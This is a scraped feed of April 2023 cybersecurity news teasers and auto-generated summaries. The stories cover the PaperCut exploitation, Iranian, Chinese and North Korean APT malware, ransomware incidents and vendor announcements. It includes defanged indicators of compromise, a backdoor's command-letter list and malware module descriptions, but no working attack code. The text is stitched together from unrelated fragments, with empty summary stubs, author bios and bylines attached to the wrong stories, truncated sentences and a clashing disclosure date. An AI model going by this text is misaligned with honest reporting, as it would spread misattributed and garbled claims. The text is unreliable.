The tech giant"s threat intelligence team is attributing a subset of the intrusions to a financially motivated actor it tracks under the name Lace Tempest (formerly DEV-0950), which overlaps with other hacking groups like FIN11, TA505, and Evil Corp. "In observed attacks, Lace Tempest ran multiple PowerShell commands to deliver a TrueBot DLL, which connected to a C2 server, attempted to steal LSASS credentials, and injected the TrueBot payload into the conhost.exe service," Microsoft said in a series of tweets. "Iran-linked APT group Charming Kitten employed a new malware dubbed BellaCiao in attacks against victims in the U.S., Europe, the Middle East and India. Iran-linked Charming Kitten group, (aka APT35, Phosphorus, Newscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media. Microsoft has been tracking the threat actors at […]
The post Iranian Charming Kitten APT used a new BellaCiao malware in recent wave of attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Charming Kitten) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Z:\BellaCiao\BellaCiao\More Targets\<Country>\<Public IP>\<Hostname>\backdoor\MicrosoftAgentServices\MicrosoftAgentServices\obj\Release\ “Using information from these files, we can learn that victims were organized in different folders by country, using folder names like IL(Israel), TR(Turkey), AT(Austria), IN(India) or IT(Italy)” "Autosummary:
Electrum, Binance, Exodus, Atomic : Electrum, Binance, Exodus, Atomic Cryptocurrency wallet extensions : 50 extensions are targeted in total, including Trust Wallet, Exodus Web3 Wallet, Jaxx Liberty, Coinbase, Guarda, TronLink, Trezor Password Manager, Metamask, Yoroi, and BinanceChain. "At RSA Conference 2023, Thales launched CipherTrust Transparent Encryption Ransomware Protection (CTE-RWP), an optional licensed feature to the CipherTrust Data Security Platform. CTE-RWP will elevate the protection of customer files and folders from ransomware attacks via access management controls and encryption processes. According to the 2023 Thales Data Threat Report, 49% of IT professionals reported an increase in ransomware attacks with 22% of organisations having experienced a ransomware attack in past 12 months. Ransomware attacks … More
The post Thales CTE-RWP protects critical files and folders from ransomware attacks appeared first on Help Net Security.
"Autosummary:
The release of this new Ransomware Protection helps bring an industry-leading solution to market, strengthening the Thales CipherTrust Data Security Platform and offering further protection against an ever-increasing threat to data. "Autosummary:
The Windows malware, dubbed Octopus and which masqueraded as an alternative version of the Telegram messaging app, is a Delphi-based tool that allows the adversary to surveil victims, siphon sensitive data, and gain backdoor access to their systems via a command-and-control (C2) panel. "Autosummary:
TA0005: Defense Evasion T1027: Obfuscated Files or Information Malware uses Base64 algorithm to encode and decode data TA0005: Defense Evasion T1027: Obfuscated Files or Information Malware uses AES algorithm to encrypt and decrypt data ANY.RUN is running a limited-time offer, celebrating the 7th Cyberbirthdsay ANY.RUN is an interactive cloud malware sandbox that can extract malware configs automatically for numerous families, saving researchers hours of effort. If you discover that ANY.RUN enhances your malware analysis workflow, they are also offering a limited promotion, available until May 5th: receive 6 or 12 months of free usage when you sign up for a yearly or two-year subscription, respectively. "CyberNews analyzed a classic cryptocurrency romance scam, also known as CryptoRom, explaining how scammers hid the money CryptoRom scammers hid the money with several layers of obfuscation, but the Cybernews research team discovered that the stolen funds ended up in Binance accounts. A man from Florida in the US recently reached out to Cybernews for […]
The post CryptoRom: OkCupid scam cost Florida man $480k – we followed the money to Binance appeared first on Security Affairs.
"Autosummary:
If you want to know how to avoid such kind of scams give a look at the original post: Original post at https://cybernews.com/security/okcupid-scam-florida-man-binance/ About the author: Vilius Petkauskas, Senior Journalist at CyberNews Blogger Awards 2022 – VOTE FOR YOUR WINNERS Vote for me in the sections: The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, OkCupid scam) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
BleepingComputer has seen this with almost all enterprise-targeting ransomware operations, including Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, Hive, and now, RTM Locker. "Autosummary:
"Microsoft revealed that recent attacks against PaperCut servers aimed at distributing Cl0p and LockBit ransomware. Microsoft linked the recent attacks against PaperCut servers to a financially motivated threat actor tracked as Lace Tempest (formerly DEV-0950). The group is known to be an affiliate of the Clop ransomware RaaS affiliate, it has been linked to GoAnywhere attacks and […]
The post Crooks use PaperCut exploits to deliver Cl0p and LockBit ransomware appeared first on Security Affairs.
"Autosummary:
— Microsoft Threat Intelligence (@MsftSecIntel) April 26, 2023 About the author: Vilius Petkauskas, Senior Journalist at CyberNews Blogger Awards 2022 – VOTE FOR YOUR WINNERS Vote for me in the sections: The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "In this Help Net Security interview, Eve Maler, CTO at ForgeRock, talks about how digital identities continue to play a critical role in how we access online services securely. Maler also highlights the challenges encountered by various industries in implementing decentralized digital identities. What challenges do decentralized digital identity systems face, and how can they be overcome? Decentralized identity is a nascent area, and we’re at an exciting moment in time where decentralized digital identities … More
The post Overcoming industry obstacles for decentralized digital identities appeared first on Help Net Security.
"Autosummary:
People will be able to get a credential one day – and then, the next day or week or year, be able to convincingly tell a service provider that they’ve already been proven to be old enough, or that they have a license to drive, or what have you.One of the strongest examples of implementation of decentralized digital identity systems is the mobile driver’s license (mDL) movement in the US for context, an mDL is a driver license (or ID card) stored in secure digital form on a mobile device with the capability to be queried in real time in a privacy-sensitive fashion. Third, ensure that the parts of the decentralized identity systems that have to do with security and privacy are robustly implemented, so that the promises made by decentralized identity today can be realized.Digital identity wallets attempt to decentralize identity information, that is, literally to put that data “on the edge” in the form of individuals’ wallets. "The increase in reported ransomware victims across Q1 2023 reflects the continued prevalence of ransomware as a worldwide, industry agnostic threat, according to GuidePoint Security. The report is based on data obtained from publicly available resources, including threat groups themselves, and insight into the ransomware threat landscape. In the first quarter, GRIT tracked 849 total publicly posted ransomware victims claimed by 29 different threat groups. Increase in public ransomware victims GRIT’s latest report shows a … More
The post New coercive tactics used to extort ransomware payments appeared first on Help Net Security.
"Autosummary:
While manufacturing and technology continue to be the most impacted sectors, observed victims in the legal industry increased 65% from Q4 2022 to Q1 2023, from 23 to 38, with 70% consistently attributed to the most prolific “double-extortion” model ransomware groups – LockBit, AlphV, Royal, and BlackBasta. "Autosummary:
Naveen Sunkavally, the chief architect at Horizon3.ai, described the issue as "a dangerous default configuration in Apache Superset that allows an unauth attacker to gain remote code execution, harvest credentials, and compromise data. "Autosummary:
The parameters and corresponding commands are: A – Get the current directory B – List folder C – Read text file D – Write a text file E – Delete file or folder F – Read binary file, convert to hex G – Write binary file, convert to hex H – Copy file or folder I – Rename a file J – Create a Directory K – Timestamp file with a specified timestamp in "%04d-%d-%d %d:%d:%d" format M – Run command Unit 42 comments that the command handlers used in PingPull match those observed in another malware named "China Chopper," a web shell seen heavily used in attacks against Microsoft Exchange servers. "Autosummary:
Charming Kitten, also known as APT35, Cobalt Illusion, Educated Manticore, ITG18, Mint Sandstorm (née Phosphorus), TA453, and Yellow Garuda, is an Iranian state-sponsored APT group associated with the Islamic Revolutionary Guard Corps (IRGC). "Autosummary:
Evasive Panda, also known as Bronze Highland and Daggerfly, is a Chinese-speaking APT group that has been attributed to a series of cyber espionage attacks targeting various entities in China, Hong Kong, and other countries located in East and South Asia since at least late December 2012. "ESET Research uncovers a campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software
The post Evasive Panda APT group delivers malware via updates for popular Chinese software appeared first on WeLiveSecurity
"Autosummary:
AS58542 QQUrlMgr.exe QQ.exe QQLive.exe QQCall<XX>.exe 183.232.96[.]107 AS56040 61.129.7[.]35 AS4811 Hypotheses of compromise When we analyzed the likelihood of several methods that could explain how the attackers managed to deliver malware through legitimate updates, we were left with two scenarios: supply-chain compromise, and adversary-in-the-middle attacks.Government entities were targeted in China, Macao, and Southeast and East Asian countries, specifically Myanmar, the Philippines, Taiwan, and Vietnam, while other organizations in China and Hong Kong were also targeted. Steals credentials from Chrome, Opera, Firefox, Foxmail, QQBrowser, FileZilla, and WinSCP, among others. In Table 1, we provide the URL from where the download originated, according to ESET telemetry data, including the IP addresses of the servers, as resolved at the time by the user’s system; therefore, we believe that these IP addresses are legitimate. Supply-chain compromise scenario Given the targeted nature of the attacks, we speculate that attackers would have needed to compromise the QQ update servers to introduce a mechanism to identify the targeted users to deliver them the malware, filtering out non-targeted users and delivering them legitimate updates – we registered cases where legitimate updates were downloaded through the same abused protocols. Toolset MgBot MgBot is the primary Windows backdoor used by Evasive Panda, which according to our findings has existed since at least 2012 and, as mentioned in this blog post, was publicly documented at VirusBulletin in 2014. Deobfuscated, the complete update check URL is: http://c.gj.qq[.]com/fcgi-bin/busxml?busid=20&supplyid=30088&guid=CQEjCF9zN8Zdyzj5S6F1MC1RGUtw82B7yL+hpt9/gixzExnawV3y20xaEdtektfo&dm=0 The server responds with XML-formatted data encoded with base64 and encrypted with an implementation of the TEA algorithm using a 128-bit key.Similar to what we observed on this cluster of Evasive Panda victims, their researchers found that, since 2020, victims of LuoYu had received the WinDealer malware through updates via the legitimate application qgametool.exe from the PPTV software, also developed by a Chinese company. Wrap-up Ultimately, without further evidence, we cannot prove or discard one hypothesis in favor of the other, given that such capabilities are at hand for Chinese APT groups. "Autosummary:
MgBot uses a modular architecture to extend its functionality, receiving DLL plugins from the C2 that perform specialized functions, including: Keylogging on specific Tencent apps Stealing files from hard drives and USB pen drives Capturing text copied to the clipboard Capturing input and output audio streams Stealing credentials from Outlook and Foxmail email clients Stealing credentials from Chrome, Opera, Firefox, Foxmail, QQBrowser, FileZilla, WinSCP, and more Stealing the content of the Tencent QQ database that stores the user"s message history Stealing information from Tencent WeChat Stealing cookies from Firefox, Chrome, and Edge In conclusion, the Evasive Panda APT was found targeting users in China, aiming to steal data mostly from Chinese apps, leveraging an unclear method to perform a supply chain attack on Tencent QQ software. "Autosummary:
"Yesterday, a federal judge in the Southern District of New York unsealed our civil action against the malware distributors of Cryptbot, which we estimate infected approximately 670,000 computers this past year and targeted users of Google Chrome to steal their data," the Head of Litigation Advance Mike Trinh and Threat Analysis Group"s Pierre-Marc Bureau said. "Autosummary:
LSA Protection enabled (BleepingComputer) Kernel-mode Hardware-enforced Stack Protection warnings As BleepingComputer reported last week after the LSA Protection UI was removed from the Windows Security > Device Security > Core Isolation settings page, users are now seeing similar alerts, this time warning them that their devices may be vulnerable because Kernel-mode Hardware-enforced Stack Protection (HSP) is off due to conflicting drivers. "A group of OT cybersecurity leaders and critical infrastructure defenders introduced their plans for ETHOS (Emerging THreat Open Sharing), an open-source, vendor-agnostic technology platform for sharing anonymous early warning threat information across industries with peers and governments. Founding ETHOS community members include 1898 & Co., ABS Group, Claroty, Dragos, Forescout, NetRise, Network Perception, Nozomi Networks, Schneider Electric, Tenable, and Waterfall Security Solutions. ETHOS will give critical industries a vendor-neutral option for information sharing to combat … More
The post Cybersecurity leaders introduced open-source information sharing to help OT community appeared first on Help Net Security.
"Autosummary:
Founding ETHOS community members include 1898 & Co., ABS Group, Claroty, Dragos, Forescout, NetRise, Network Perception, Nozomi Networks, Schneider Electric, Tenable, and Waterfall Security Solutions.To remain highly vigilant against potential attacks and adversaries, ETHOS provides collective defense through vendor-agnostic information-sharing from both public and private sources that enables improved metrics like time-to-detection and time-to-respond,” said Matt Morris, Managing Director for Security & Risk Consulting at 1898 & Co. “ETHOS is answering the call to protect the nation’s critical infrastructure by tearing down barriers and closing the gap on how we can rapidly respond to new and emerging threats impacting the safety and security of industrial operations. "Autosummary:
The Linux flavor of the malware boasts of similar functionalities as its Windows counterpart, allowing it to carry out file operations and run arbitrary commands by transmitting from the C2 server a single upper case character between A and K, and M. "Upon execution, this sample is configured to communicate with the domain yrhsywu2009.zapto[.]org over port 8443 for C2," Unit 42 said. "Autosummary:
"Autosummary:
"Autosummary:
Cisco Prime Collaboration Deployment Release First Fixed Release 14 and earlier 14SU3 (May 2023) Zero-day disclosed in December still waiting for a patch Cisco also has to patch another high-severity IP Phone zero-day (CVE-2022-20968) with publicly available exploit code, disclosed in early December 2023. "China-linked threat actor tracked as Alloy Taurus is using a Linux variant of the PingPull backdoor and a new tool dubbed Sword2033. Researchers from Palo Alto Networks Unit 42 recently observed the China-linked Alloy Taurus group (aka GALLIUM, Softcell) targeting Linux systems with a new variant of PingPull backdoor. While investigating the activity of the group, the […]
The post China-linked Alloy Taurus APT uses a Linux variant of PingPull malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Alloy Taurus) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Ransomware gangs behind attacks Today, Microsoft disclosed that the Clop and LockBit ransomware gangs are behind these PaperCut attacks and using them to steal corporate data from vulnerable servers. "Categories: News Tags: PaperCut Tags: server Tags: exploit Tags: attack Tags: authentication Tags: update Tags: patch We take a look at urgent updates needed for users of PaperCut, after two exploits were found in the wild. |
The post Update your PaperCut application servers now: Exploits in the wild appeared first on Malwarebytes Labs.
"Autosummary:
Two specific vulnerabilities are at the heart of this alert, and are ranked with severity scores of 9.8 (critical) and 8.2 (high) respectively. If you’re unable to upgrade PaperCut advises those who are unable to apply the patches to follow the below steps: Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default)Posted: April 26, 2023 by We take a look at urgent updates needed for users of PaperCut, after two exploits were found in the wild. "Autosummary:
"Autosummary:
Ransomware gangs behind attacks Today, Microsoft disclosed that the Clop and LockBit ransomware gangs are behind these PaperCut attacks and using them to steal corporate data from vulnerable servers. "Cybercriminals around the world are using generative artificial intelligence (AI) to execute malicious attacks that can take down companies and governments. SentinelOne plans to use the same technologies to defeat them. The company has unveiled a threat-hunting platform that integrates multiple layers of AI technology to deliver security capabilities and real-time, autonomous response to attacks across the entire enterprise. The news was announced during RSA Conference 2023, the premier cybersecurity event being held at the … More
The post SentinelOne unveils cybersecurity AI platform appeared first on Help Net Security.
"Autosummary:
An intelligent, action-oriented approach Built on the security data lake, the SentinelOne threat-hunting platform aggregates and correlates information from device and log telemetry across endpoint, cloud, network and user data, and not only delivers insights, but recommends response actions that can be immediately executed – from mitigation and investigation to endpoint, cloud and user management. "Phishing scams are a growing threat, and cybercriminals’ methods are becoming increasingly sophisticated, making them harder to detect and block, according to Zscaler report. The report found that a majority of modern phishing attacks rely on stolen credentials and outlined the growing threat from Adversary-in-the-Middle (AitM) attacks, increased use of the InterPlanetary File System (IPFS), as well as reliance on phishing kits sourced from black markets and AI tools like ChatGPT. “Phishing remains one of … More
The post AI tools help attackers develop sophisticated phishing campaigns appeared first on Help Net Security.
"Autosummary:
Zscaler recommends the following best practices to manage phishing risk better: Understand the risks to better inform policy and strategy Leverage automated tools and threat intel to reduce phishing incidents Implement zero trust architectures to limit the blast radius of successful attacks Deliver timely training to build security awareness and promote user reporting Simulate phishing attacks to identify gaps in your program The Zscaler Zero Trust Exchange protects systems from phishing Industry statistics reveal that the average organization receives a high volume of phishing emails daily, and user compromise is one of the most complex security challenges to defend against. While the U.S. continues to lead the way, the research revealed staggering year-over-year increases in phishing attempts targeting Canada (718%), the U.K. (269%), Russia (199%), and Japan (92%).Threat actors are leveraging phishing kits & AI tools to launch highly effective e-mail, SMiShing, and Vishing campaigns at scale”,” said Deepen Desai, Global CISO and Head of Security, Zscaler. "An unauthenticated RCE flaw (CVE-2023-27350) in widely-used PaperCut MF and NG print management software is being exploited by attackers to take over vulnerable application servers, and now there’s a public PoC exploit. About the vulnerability According to PaperCut, the attacks seem to have started on April 14, 2023 – a month and a week after the software maker released new PaperCut MF and NG versions that fixed CVE-2023-27350 and CVE-2023–27351, an unauthenticated information disclosure flaw … More
The post PoC exploit for abused PaperCut flaw is now public (CVE-2023-27350) appeared first on Help Net Security.
"Autosummary:
They just noted that: CVE-2023-27350 exists within the SetupCompleted class, stems from improper access control, and can result in an authentication bypass and remote code execution on vulnerable installations CVE-2023-27351 exists within the SecurityRequestFilter class, stems from an improper implementation of the authentication algorithm, and can result in an authentication bypass and disclosure of sensitive information PaperCut says CVE-2023-27350 is being exploited but that they currently have no evidence that CVE-2023-27351 is. "North Korea-linked APT group BlueNoroff (aka Lazarus) was spotted targeting Mac users with new RustBucket malware. Researchers from security firm Jamf observed the North Korea-linked BlueNoroff APT group using a new macOS malware, dubbed RustBucket, family in recent attacks. The group BlueNoroff is considered a group that operates under the control of the notorious North Korea-linked Lazarus APT group. The […]
The post North Korea-linked BlueNoroff APT is behind the new RustBucket Mac Malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "Autosummary:
Mixing legitimate-appearing traffic with garbage requests (ZDI) TP-Link fix TP-Link first attempted to address the problem on February 24, 2023, but the fix was incomplete and did not prevent exploitation. "Autosummary:
The top 10 countries with the most organizations having vulnerable SLP instances are the U.S., the U.K., Japan, Germany, Canada, France, Italy, Brazil, the Netherlands, and Spain. "Autosummary:
To build a modern exposure management program, organizations should recognize the evolution of threat actors and their tactics, establish an operational process for ensuring continuous security posture improvement, and implement a plan consisting of remediation planning, remediation review, risk mitigation and mitigation verification. "Autosummary:
A majority of the files have been submitted to the malware-scanning platform from South Korea, the U.S., Italy, and Israel, and the U.K. "The group uses a variety of techniques and tools to conduct espionage, sabotage, and theft operations, including spear-phishing and credential harvesting," the Google Chronicle subsidiary said. "The actor primarily targets organizations in the U.S. and South Korea, including individuals working within the government, military, manufacturing, academic, and think tank organizations that possess subject matter expertise in defense and security, particularly nuclear security and nonproliferation policy," Google-owned Mandiant noted last year. "Autosummary:
The first vulnerability (CVE-2023-20869) is a stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality which allows local attackers to execute code as the virtual machine"s VMX process running on the host. "Autosummary:
Most vulnerable instances are in the United States, Great Britain, Japan, Germany, Canada, France, Italy, Brazil, the Netherlands, and Spain, owned by several Fortune 1000 companies in technology, telecommunications, healthcare, insurance, finance, hospitality, and transportation. "Autosummary:
" Yes, it"s undoubtedly a nuisance for some if Eurocontrol"s website is knocked offline by a DDoS attack, or becomes difficult to access, but the website itself is not used for critical operations that could impact flight safety but is rather a way of sharing public information. "VMware addressed zero-day flaws that can be chained to achieve arbitrary code execution on Workstation and Fusion software hypervisors. VMware released security updates to address two zero-day vulnerabilities (CVE-2023-20869, CVE-2023-20870) that were chained by the STAR Labs team during the Pwn2Own Vancouver 2023 hacking contest against Workstation and Fusion software hypervisors. The STAR Labs (@starlabs_sg) […]
The post VMware addressed two zero-day flaws demonstrated at Pwn2Own Vancouver 2023 appeared first on Security Affairs.
"Autosummary:
"Categories: News Categories: Ransomware Tags: Yellow Pages Tags: Canada Tags: Black Basta Tags: ransomware Yellow Pages Canada has suffered a cyberattack by the Black Basta ransomware group. |
The post Black Basta ransomware attacks Yellow Pages Canada appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Franco Sciannamblo, YP"s Senior Vice President Chief Financial Officer commented in a statement to BleepingComputer: “Based on our investigation to date, we have reason to believe that the unauthorized third party stole certain personal information from servers containing YP employee data and limited data relating to our business customers.After the data is copied, the ransomware encrypts files with the ".basta" extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. "Accenture and Google Cloud announced an expansion of their global partnership to help businesses better protect critical assets and strengthen security against persistent cyber threats. Together, they are providing the technology, trusted infrastructure, and security expertise organizations need to build resilient security programs and maintain confidence in their readiness. The two companies have partnered since 2018 to help the world’s largest organizations fundamentally improve their businesses by harnessing Google Cloud’s leading technology in data analytics, … More
The post Accenture and Google Cloud expand collaboration to accelerate cybersecurity resilience appeared first on Help Net Security.
"Autosummary:
Security-specific generative AI from Google Cloud : Accenture will be the first company to utilize the Google Cloud Security AI Workbench, an industry-first extensible platform powered by a specialized, security large language model (LLM), Sec-PaLM, that leverages Google’s visibility into the threat landscape and Mandiant’s frontline intelligence on vulnerabilities, malware, threat indicators, and more. : Accenture will be the first company to utilize the Google Cloud Security AI Workbench, an industry-first extensible platform powered by a specialized, security large language model (LLM), Sec-PaLM, that leverages Google’s visibility into the threat landscape and Mandiant’s frontline intelligence on vulnerabilities, malware, threat indicators, and more. "Deep Instinct announced a new partnership with eSentire to protect eSentire customers from unknown and zero-day attacks. As ransomware and data exfiltration become more prevalent and damaging to businesses, the need for proactive cybersecurity has never been greater. Gartner projects that more than 60 percent of organizations using Endpoint Detection and Response (EDR) will also deploy MDR by 2026. The strategic partnership between Deep Instinct and eSentire will not only enable go-to-market collaboration but will … More
The post Deep Instinct partners with eSentire to protect customers from unknown and zero-day attacks appeared first on Help Net Security.
"Autosummary:
“Having served on a board with Amit and knowing his deep technology skills and understanding of the MSSP/MDR market makes him a natural fit as we further expand our relationships as the best malware prevention choice for MDRs, MSSPs, service providers, and carriers,” said Bess. "NetRise announced $8 million in funding, led by Squadra Ventures, with participation by existing major investors Miramar Digital Ventures, Sorenson Ventures and DNX Ventures. NetRise has developed a cloud-based SaaS platform that analyzes and continuously monitors the firmware of Extended Internet of Things (XIoT) devices. Leading the market as a software supply chain detection & response platform, NetRise enables device manufacturers and enterprise customers to detect, respond to, and prevent threats throughout their supply chains. … More
The post NetRise raises $8 million to advance XIoT security technology appeared first on Help Net Security.
"Autosummary:
We have built our platform in such a way that support for automotive, networking equipment, consumer IoT, industrial control systems, and medical device firmware alike are all supported.” said Tom Pace, CEO of NetRise. "Expel has released Expel Vulnerability Prioritization, a new solution that highlights which vulnerabilities pose the greatest risk, so organizations can take immediate, informed action. The solution empowers security teams to understand their most urgent risk areas within their detection and response workflows for seamless investigation and remediation, and eliminates the need for teams to spend hours investigating vulnerabilities. “Not all vulnerabilities were created equal—resource-constrained teams dealing with an ever-increasing list of things to patch and … More
The post Expel Vulnerability Prioritization identifies critical and damaging vulnerabilities appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Resecurity is excited to announce its participation at RSA Conference 2023, the cybersecurity event that brings together industry leaders and professionals to share knowledge and insights on the latest trends, threats, and solutions. The event will take place from April 24-27, 2023, at the Moscone Center in San Francisco, California. This year’s theme “Stronger Together” resonates with Resecurity’s mission to provide cybersecurity solutions that empower organizations to detect, prevent, and respond to sophisticated cyber threats. … More
The post Resecurity to showcase innovative cybersecurity solutions at RSA Conference 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The way the Eval PHP plugin works it"s enough to save a page as a draft in order to execute the PHP code inside the [evalphp] shortcodes," Martin explained, adding the rogue pages are created with a real site administrator as their author, suggesting the attackers were able to successfully sign in as a privileged user. "Print management software provider PaperCut confirmed ongoing active exploitation of CVE-2023-27350 vulnerability. On April 19th, Print management software provider PaperCut confirmed that it is aware of the active exploitation of the CVE-2023-27350 vulnerability. The company received two vulnerability reports from the cybersecurity firm Trend Micro) for high/critical severity security issues in PaperCut MF/NG. Trend Micro announced they will […]
The post Russian cybercrime group likely behind ongoing exploitation of PaperCut flaws appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Internet-exposed PaperCut servers (Shodan) Links to Clop ransomware According to Huntress security researchers who have been analyzing post-exploitation activity linked to these ongoing attacks since April 16, when the first attacks were observed, threat actors have been using the flaw to execute PowerShell commands that install Atera and Syncro remote management software. "Autosummary:
Fake KuCoin promotion on kucoinevent[.]com Source: BleepingComputer The fake giveaway invited all users to participate by sending any amount and receiving double in return, claiming that all persons are eligible for participation, even those without a KuCoin account. "At RSA Conference 2023, Akamai Technologies unveiled Brand Protector, a new solution that detects and disrupts phishing sites, fake stores, and brand impersonations. Brand Protector enables organizations to retain and grow customer loyalty while minimizing loss, drops in productivity and bad customer feedback. According to Google, over 50,000 new phishing websites are created every week. Akamai Brand Protector inspects trillions of digital activities a day across both internal and external sources to discover abuse of … More
The post Akamai Brand Protector defends against phishing attacks and fake websites appeared first on Help Net Security.
"Autosummary:
At RSA Conference 2023, Akamai Technologies unveiled Brand Protector, a new solution that detects and disrupts phishing sites, fake stores, and brand impersonations. “Attackers are increasingly abusing trusted brand names to lure end-users through phishing and fake sites for the promise of financial gain,” said Rupesh Chokshi, SVP and GM, Application Security at Akamai. "Autosummary:
"More precisely, on September 13, 2022, around 05:40 UTC, an operator attempted to deploy several known Tomiris implants via Telemiris: first a Python Meterpreter loader, then JLORAT and Roopy," the researchers explained. "Autosummary:
Grixba, a .NET-based information stealer, is designed to scan a machine for security programs, backup software, and remote administration tools, and exfiltrate the gathered data in the form of CSV files that are then compressed into ZIP archives. "Autosummary:
"The National Cybersecurity Alliance (NCA) launched their Historically Black Colleges and Universities Scholarship Program. Established in partnership with One In Tech, an ISACA Foundation, the initiative will provide support to individuals who are currently underrepresented in the industry by ensuring equitable access and advancements within the cybersecurity and tech careers. The new program will build off of NCA’s recently launched HBCU Career Program “See Yourself In Cyber” that aims to equip students with the necessary … More
The post National Cybersecurity Alliance launches HBCU Scholarship Program appeared first on Help Net Security.
"Autosummary:
"Threat actors are exploiting PaperCut MF/NG print management software flaws in attacks in the wild, while researchers released PoC exploit code. Hackers are actively exploiting PaperCut MF/NG print management software flaws (tracked as CVE-2023-27350 and CVE-2023-27351) in attacks in the wild. The threat actors were observed installing the Atera remote management software to take over vulnerable servers. On […]
The post Experts released PoC Exploit code for actively exploited PaperCut flaw appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The Teacher – Most Educational Blog The Entertainer – Most Entertaining Blog The Tech Whizz – Best Technical Blog Best Social Media Account to Follow (@securityaffairs) Please nominate Security Affairs as your favorite blog. "Categories: News Categories: Scams Tags: Flipper Zero Tags: fake Flipper Zero sites Flipper Zero units are being sold on sites not recognized by developers. Stay away! |
The post Fake Flipper Zero sellers are after your money appeared first on Malwarebytes Labs.
"Autosummary:
The makings of a fake Flipper Zero site Most bogus Flipper Zero sites mimic the clean design of the real thing located at the genuine site, flipperzero.one.If you"re on the genuine Flipper Zero site, payment methods will include card, PayPal, and Google Pay. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Balancing cybersecurity with business priorities: Advice for Boards In this Help Net Security interview, Alicja Cade, Director, Financial Services, Office of the CISO, Google Cloud, offers insights on how asking the right questions can help improve cyber performance and readiness, advance responsible AI practices, and balance the need for cybersecurity with other business priorities. Wargaming an effective data breach playbook … More
The post Week in review: 5 free online cybersecurity resources for SMBs, AI tools might fuel BEC attacks appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: April 21, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Armorblox, Cofense, D3 Security, Sotero, Venafi, Veracode, Versa Networks, and Zyxel Networks. "Autosummary:
“This multiple-part (DNS) signature gave us strong confidence that the (correlated) domains were not only using Pupy, but they were all part of Decoy Dog – a large, single toolkit that deployed Pupy in a very specific manner on enterprise or large organizational, non-consumer, devices,” Infoblox revealed in its report. "Non-profit health insurer Point32Health suffered a ransomware attack and has taken systems offline in response to the incident. Non-profit health insurer Point32Health has taken systems offline in response to a ransomware attack that took place on April 17. The insurer immediately launched an investigation into the incident with the help of third-party cybersecurity experts to […]
The post Health insurer Point32Health suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Onapsis has unveiled a series of new product updates for the Onapsis Platform. Enriched with the threat intelligence, the Onapsis Platform further simplifies business application security for CISOs and CIOs alike with a new Security Advisor, new updates to its Comply product line, and critical enhancements that streamline code security from application development to production. “As the only cybersecurity and compliance solution endorsed by SAP, Onapsis is proud to lead the charge in helping organizations … More
The post Onapsis updates its platform to strenghten ERP cybersecurity appeared first on Help Net Security.
"Autosummary:
The Security Advisor leverages the accumulated “best security practices” to: Identify gaps in visibility and areas for improvement Highlight areas of unaddressed risk Track effectiveness of response over time Benchmark an organization against others and chart progress Provide personalized guidance and insights based on a client’s unique landscape Help security and business leaders better communicate security progress to their leadership and the board. "Autosummary:
The three vulnerabilities are as follows - CVE-2023-28432 (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability (CVSS score - 7.5) - MinIO Information Disclosure Vulnerability CVE-2023-27350 (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control Vulnerability (CVSS score - 9.8) - PaperCut MF/NG Improper Access Control Vulnerability CVE-2023-2136 (CVSS score - TBD) - Google Chrome Skia Integer Overflow Vulnerability "In a cluster deployment, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure," MinIO maintainers said in an advisory published on March 21, 2023. "Autosummary:
"Autosummary:
.NET loader"s code (Fortinet) The EvilExtractor version deployed in these attacks features the following modules: Date time checking Anti-Sandbox Anti-VM Anti-Scanner FTP server setting Steal data Upload Stolen data Clear log Ransomware The EvilExtractor data-stealing module will download three additional Python components named "KK2023.zip," "Confirm.zip," and "MnMs.zip." "Autosummary:
